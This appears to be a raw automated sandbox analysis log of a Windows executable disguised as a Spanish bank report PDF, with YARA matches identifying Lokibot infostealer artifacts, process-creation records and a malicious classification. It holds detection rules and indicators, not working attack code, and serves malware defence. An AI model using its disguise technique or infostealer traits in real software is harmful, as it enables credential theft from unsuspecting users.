              Source: initial sampleStatic PE information: Filename: Informe bancario.pdf.exe
              Source: Informe bancario.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
              Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_004BA841
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_004BA641
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_004BA276
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_004BA141
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_004BA541
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_004BA741
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_004BA96F
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_004BA36E
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_00E3E2E0
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_00E3E2F0
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_00E3C37C
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_0523B6FF
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_05239F6E
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_05239F74
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 4_2_002BA276
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 4_2_002BA841
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 4_2_002BA641
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 4_2_002BA96F
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 4_2_002BA36E
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 4_2_002BA141
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 4_2_002BA541
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 4_2_002BA741
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_0040549C
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_004029D4
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_006EA841
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_006EA96F
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_006EA141
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_006EA541
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_006EA276
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_006EA641
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_006EA36E
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_006EA741
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: String function: 00405B6F appears 42 times
              Source: Informe bancario.pdf.exe, 00000000.00000002.291866815.000000000052C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameExtensibleClassFact.exeL vs Informe bancario.pdf.exe
              Source: Informe bancario.pdf.exe, 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNativeVariant.dll" vs Informe bancario.pdf.exe
              Source: Informe bancario.pdf.exe, 00000000.00000002.292778532.0000000003799000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTweenEngineAPI.dllD vs Informe bancario.pdf.exe
              Source: Informe bancario.pdf.exe, 00000000.00000002.292409069.0000000002791000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloneHelper.dll4 vs Informe bancario.pdf.exe
              Source: Informe bancario.pdf.exe, 00000000.00000002.296271588.0000000006DC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCloneHelper.dll4 vs Informe bancario.pdf.exe
              Source: Informe bancario.pdf.exe, 00000000.00000002.296458212.0000000006F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTweenEngineAPI.dllD vs Informe bancario.pdf.exe
              Source: Informe bancario.pdf.exe, 00000000.00000002.292050279.0000000000C08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Informe bancario.pdf.exe
              Source: Informe bancario.pdf.exe, 00000000.00000002.296387769.0000000006DF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNativeVariant.dll" vs Informe bancario.pdf.exe
              Source: Informe bancario.pdf.exe, 00000004.00000000.276402608.000000000032C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameExtensibleClassFact.exeL vs Informe bancario.pdf.exe
              Source: Informe bancario.pdf.exe, 00000005.00000000.286119009.000000000075C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameExtensibleClassFact.exeL vs Informe bancario.pdf.exe
              Source: Informe bancario.pdf.exeBinary or memory string: OriginalFilenameExtensibleClassFact.exeL vs Informe bancario.pdf.exe
              Source: Informe bancario.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Informe bancario.pdf.exeVirustotal: Detection: 29%
              Source: Informe bancario.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\Informe bancario.pdf.exe "C:\Users\user\Desktop\Informe bancario.pdf.exe"
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess created: C:\Users\user\Desktop\Informe bancario.pdf.exe C:\Users\user\Desktop\Informe bancario.pdf.exe
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess created: C:\Users\user\Desktop\Informe bancario.pdf.exe C:\Users\user\Desktop\Informe bancario.pdf.exe
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess created: C:\Users\user\Desktop\Informe bancario.pdf.exe C:\Users\user\Desktop\Informe bancario.pdf.exe
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess created: C:\Users\user\Desktop\Informe bancario.pdf.exe C:\Users\user\Desktop\Informe bancario.pdf.exe
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Informe bancario.pdf.exe.logJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@46/2
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
              Source: Informe bancario.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
